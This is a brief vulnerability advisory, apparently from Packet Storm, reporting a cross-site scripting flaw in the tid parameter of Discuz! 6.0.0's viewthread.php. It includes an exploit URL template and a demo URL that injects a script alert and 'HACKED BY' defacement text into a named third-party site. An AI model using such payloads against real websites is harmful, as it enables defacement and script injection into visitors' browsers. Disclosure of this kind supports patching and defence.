Discuz! version 6.0.0 suffers from a cross site scripting vulnerability.
bc946b356870b8085d969310360a71bc24171d2134452572fcd12fdece9df47a# Discuz! 6.0.0
# Download:
http://www.comsenz.com/downloads/install/discuz
# Vendor: www.comsenz.com
# Author: s4r4d0
# mail: s4r4d0@yahoo.com
# Bug: Cross site scripting has benn found on viewthread.php file.
# Exploit: http://host/bbs/viewthread.php?tid=[Xss]
# Demo: http://www.socvista.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal
Error</h1></marquee>
# Made in Brazil
# Team: Fatal Error
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed